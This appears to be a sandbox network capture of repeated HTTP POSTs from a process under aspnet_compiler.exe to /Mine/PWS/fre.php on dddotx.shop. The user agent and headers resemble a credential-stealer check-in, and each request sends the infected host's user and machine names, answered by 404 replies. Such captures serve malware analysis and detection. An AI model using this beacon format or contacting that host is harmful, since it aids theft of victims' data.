Sep 25, 2024 10:20:11.812237024 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okb9Udb8ZV8JDRyozIa0EcLB0Yn%2BvpOrrVT1kMOJNqPRSCJ2sbpvVqYAQSLC76DAsDQYQBAZBew17PFT4jf8AkS4xTbq0AeEp2OL5SxgcfszIIA6lQ5lclgYnE6%2FPQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997f43ef94228-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	49773	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:11.967433929 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:11.972431898 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:12.630415916 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spSKVEFIiqjwgjhlj70ZZwOYdXgnmVIBOTQAVQ1j1eNsAWQgTVnygcvp5f%2FcB1eYCpn6gui6fX8GcMtH2RA0oEIfy6jKh80Rw2zsPCjijMFGzKpccPrIDV%2FYRKIhCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997f96949728d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	49774	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:12.779400110 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:12.784342051 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:13.435775995 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKdsOSoHwa8XDlSJhQ8HUD5v4heoErtpumv3kWTUdrHhrzq7VvI54z4ONpt%2BlsJhYqiFPAZzY0ERY5fkU7j9BLBwvgekdvW4MKVI9dyktT4mu4ALluoV1fp4V7nf2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997fe7afc4307-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	49775	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:13.595252991 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:13.600308895 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:14.236275911 CEST	597	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5kJPnghWlPqYN%2FG2sLIwFQQ9j%2FXaOtzWjkxcyecEN1LUPpGwmlwNQqILmjw0DeLGrzI5WtJmrPAgzQwrXwB5UNAyhvLDhuKGX129KDJsrWtpmC%2BGJ2yQS8D0D65hQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998037c5e42be-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	49776	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:14.386653900 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:14.393220901 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:15.051773071 CEST	577	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FzpQ2TxHBX58U%2F2j9wHbFXPIkhFElAYGDoYbB76Mdhdf5slrxCdRoOzq0GX%2Fckb60%2BkLJRJq%2Fogx8QOrGkn77BOKM2QxGEYTjVwD%2BtgSyeTN%2B3P2FBGugGsyPjd%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998086b5242b7-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	49777	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:15.199145079 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:15.204070091 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:15.897368908 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exIDN%2Bc1juZkq2l7SHWeE4dFsMPWY7dlOHEmbgkL5eZVO3uUkiD4%2BmtGj0XU8jekp56a57pcWcCbNyb8jPCwDemy5iqYrouoio9c52N%2FRI4zCPk7MRm1AB6%2BaQFiCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89980d7cbe4235-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	49778	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:16.041939020 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:16.046849012 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:16.724160910 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qf9BVwq9lJP1p3l5cxisQr0x097hzsKEpAs3658NUVwHv3c3qHFminK2VK10V4ljr0Ye1pk2KCZqwu9etZVhuBHhAmuvuY403foqBGNUVc4Xn4pNpSHGr7mN3lf2GQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899812cef243cf-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	49779	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:16.870119095 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:16.874999046 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:17.550465107 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MD1XFttmi9rrwNMjXikA2KqqdgxQtUYC17QyVOMs7N%2FwpyIbt%2BIwlzmwlr7bli14QCiVobOhewEmFuhWK2RhGNL7DkNaagMQUB43k1VfJJoBXTRC04KchtRSgeIWRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899817ed5043a3-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	49780	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:17.696146011 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:17.701123953 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:18.430228949 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPwad%2FrGWuUKgQ7nIaCZyyDp9MNTaFXBtxdaNp%2BCOfeURqHaLrj5g3yx4V5l7Og4wrhmfxNiOt%2B1Z2kyfoQKHpy554Xeo6CCjUuKvdef22DfYf70h6Bovm1p8dp1aA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89981d29dc43dd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.7	49781	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:18.572189093 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:18.577127934 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:19.235716105 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FX%2FObk%2FJqP%2FGnkHcs7if9jUtHdliW50%2F6VF7%2FTIuan68OIFUxSklFkWOQaJKiSy4gF88WPrkslEnNd8vkEyImbAqhacqO2Co%2BjNnFob3a0qbeaplWJ5XcLV7f7MVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89982298bb43f8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	49782	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:19.383768082 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:19.388645887 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:20.044056892 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiImsrHdkqH7lfdKOXiVROhA4DdeNq%2BaghxFPvVAvXbUwiw4Gz7nBNzY9d0hjS7l9dRIinmV4hVrqZLbcjbyp0aBRVOLKjZQ5BImQWqf8oE7KkAsmZlH0E%2FUKWbEag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899827af6541f9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	49783	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:20.198115110 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:20.429527998 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:21.084366083 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYj01uITRSD0kXCg0qORYhZUr%2FPgrGDAZBROqs1QbvbUI1yGWE0JudnGXd208KbIuANKKWeza0uoKOhdCW904KOfiTCH9wKL8G0%2BBJBej2FfuYvfgEOYpklFQr3fbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89982e3cfe4283-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.7	49784	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:21.228310108 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:21.233232975 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:21.896749020 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YnnDjkLacFGrsKn7CParT3zYaWHJolXgX6XqSXTfaui%2BE%2FtRBaVNxWsJ4%2BfIQfs2nxU7%2BgfeFBi9tR5y0iIKt%2Bjea3KZPv5WEAoBKjc7sCYqCWhgvA17H6cWmTThmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998333f1443a4-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	49785	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:22.040514946 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:22.045367002 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:22.717554092 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OJW0hvjKcJLkr2O9EjcYUHZI2v7p51pMOXf35ES42G%2Bhk90j7pXrl5AyLLmIJTESJtIJEtenziTdGtqQh2wlnEBPxl2qBI6SZzqiMpEDAbIXVw19JjK2jxkHpCGhzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998385f7b0f9d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.7	49786	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:22.871623039 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:22.876652956 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:23.536905050 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKk9X7He4imPTn9N4bCbuqMOLMsRD5dFtRnEVnu8JTnHW2qPLruowa9him52BA0i%2FW87eZ2xDovDt5k9XjEcysGh%2BGZxQvaLAPotvRqflcXZnwNHL%2B3cx0l5xuqflQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89983d68468c4b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	49787	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:23.681214094 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:23.686182022 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
